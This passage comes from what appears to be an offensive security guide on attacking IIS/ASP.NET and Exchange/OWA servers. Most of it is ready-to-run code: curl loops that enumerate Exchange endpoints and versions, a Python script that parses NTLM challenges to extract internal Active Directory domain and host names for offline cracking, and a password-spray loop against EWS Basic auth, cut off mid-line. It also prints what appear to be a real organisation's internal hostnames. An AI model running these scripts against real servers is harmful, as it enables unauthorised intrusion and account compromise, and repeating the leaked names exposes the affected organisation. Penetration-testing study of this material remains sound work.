&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Elmah (error log)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/elmah.axd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ViewState (MAC validation)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If MAC disabled → deserialization RCE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# WebDAV&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If PUT enabled → webshell upload&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ASP.NET versions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Server: Microsoft-IIS/10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X-AspNet-Version: 4.0.30319&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X-Powered-By: ASP.NET&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Food industry — IIS 8.5 + ASP.NET 4.0 + ADFS exposed. Stack trace with internal Windows path leaked in 500 errors.&lt;/p&gt;
&lt;h3 id="84-exchange--owa--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#84-exchange--owa--attack-surface"&gt;
##
&lt;/a&gt;
8.4 Exchange / OWA — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Exchange is the most common corporate email server in government and large companies. Runs on IIS and exposes multiple endpoints.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 0. Identify Exchange&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Headers: X-OWA-Version, X-FEServer, X-AspNet-Version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Ports: 443 (OWA/ECP/EWS), 25 (SMTP), 587 (SMTP TLS)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Default Exchange endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in /owa/ /ecp/ /ews/Exchange.asmx /autodiscover/autodiscover.xml &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /powershell/ /OAB/ /Microsoft-Server-ActiveSync/ /api/; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(HTTP|X-OWA|X-FE|X-Asp)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Extract version from header&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/owa/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;X-OWA-Version&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 15.1.2507.61 = Exchange 2016 CU23&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 15.2.1258.0 = Exchange 2019 CU14&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Healthcheck (reveals internal server hostname!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/OWA/healthcheck.htm&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;200 OK&amp;lt;br/&amp;gt;ECBUE361.CNC.INTER&amp;#34; ← internal hostname + AD domain!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ecp/healthcheck.htm&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Same pattern&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Detect authentication types&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ews/Exchange.asmx&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;www-auth&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;Negotiate, NTLM, Basic realm=...&amp;#34; → Basic auth enabled!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="ntlm-challenge-capture--extract-active-directory-information" &gt;
&lt;div&gt;
&lt;a href="#ntlm-challenge-capture--extract-active-directory-information"&gt;
###
&lt;/a&gt;
NTLM Challenge Capture — Extract Active Directory Information
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Step 1: Send NTLM Type 1 (negotiation)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;type1 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ews/Exchange.asmx&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;NTLM &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;type1&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Step 2: Extract Type 2 (challenge) from WWW-Authenticate header&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ntlm_b64 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers[&lt;span style="color:#a6d189"&gt;&amp;#39;WWW-Authenticate&amp;#39;&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;split(&lt;span style="color:#a6d189"&gt;&amp;#39;NTLM &amp;#39;&lt;/span&gt;)[&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ntlm_raw &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;b64decode(ntlm_b64)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Step 3: Parse Type 2 fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sig &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[&lt;span style="color:#ef9f76"&gt;8&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;12&lt;/span&gt;] &lt;span style="color:#737994;font-style:italic"&gt;# Must be \\x02\\x00\\x00\\x00 (msg type 2)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Target Name (offset 12-20)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tgt_len &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;12&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;14&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tgt_off &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;16&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;20&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target_name &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[tgt_off:tgt_off&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;tgt_len]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-16-le&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;Target Name: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;target_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;# NetBIOS domain name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Challenge (offset 24-32)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;challenge &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[&lt;span style="color:#ef9f76"&gt;24&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;32&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;NTLM Challenge: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;challenge&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;hex()&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;# For offline cracking&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Target Info (AV_PAIRS) — contains gold!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ti_len &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;40&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;42&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ti_off &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;44&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;48&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target_info &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[ti_off:ti_off&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;ti_len]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pairs &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;NetBIOS Domain&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;NetBIOS Computer&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;DNS Domain&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;DNS Computer&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;DNS Tree&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;7&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;Timestamp&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pos &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; pos &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;4&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(target_info):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_id &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(target_info[pos:pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_len &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(target_info[pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;:pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; av_id &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;break&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvEOL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_val &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; target_info[pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;:pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;av_len]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; av_id &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; av_pairs:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; val &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; av_val&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-16-le&amp;#39;&lt;/span&gt;, errors&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;replace&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;av_pairs[av_id]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;val&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pos &lt;span style="color:#99d1db;font-weight:bold"&gt;+=&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;4&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; av_len
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;What each field reveals&lt;/strong&gt;:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;th&gt;Utility&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;NetBIOS Domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CNC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Domain NetBIOS name&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NetBIOS Computer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ECBUE361&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Exchange server name&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DNS Domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cnc.inter&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Complete internal AD domain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DNS Computer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ecbue361.cnc.inter&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Internal server FQDN&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NTLM Challenge&lt;/td&gt;
&lt;td&gt;&lt;code&gt;6178ba9de615e10e&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;For offline hash cracking&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="password-spray-via-basic-auth" &gt;
&lt;div&gt;
&lt;a href="#password-spray-via-basic-auth"&gt;
###
&lt;/a&gt;
Password Spray via Basic Auth
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Exchange with Basic realm active allows password spray WITHOUT needing NTLM:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test credentials via EWS Basic Auth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; email in admin@target.com user@target.com; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; pw in Senha2024 Senha2025; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -u &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$email&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$pw&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ews/Exchange.asmx&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;200&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;✅ &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$email&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$pw&lt;/span&gt;&lt;span 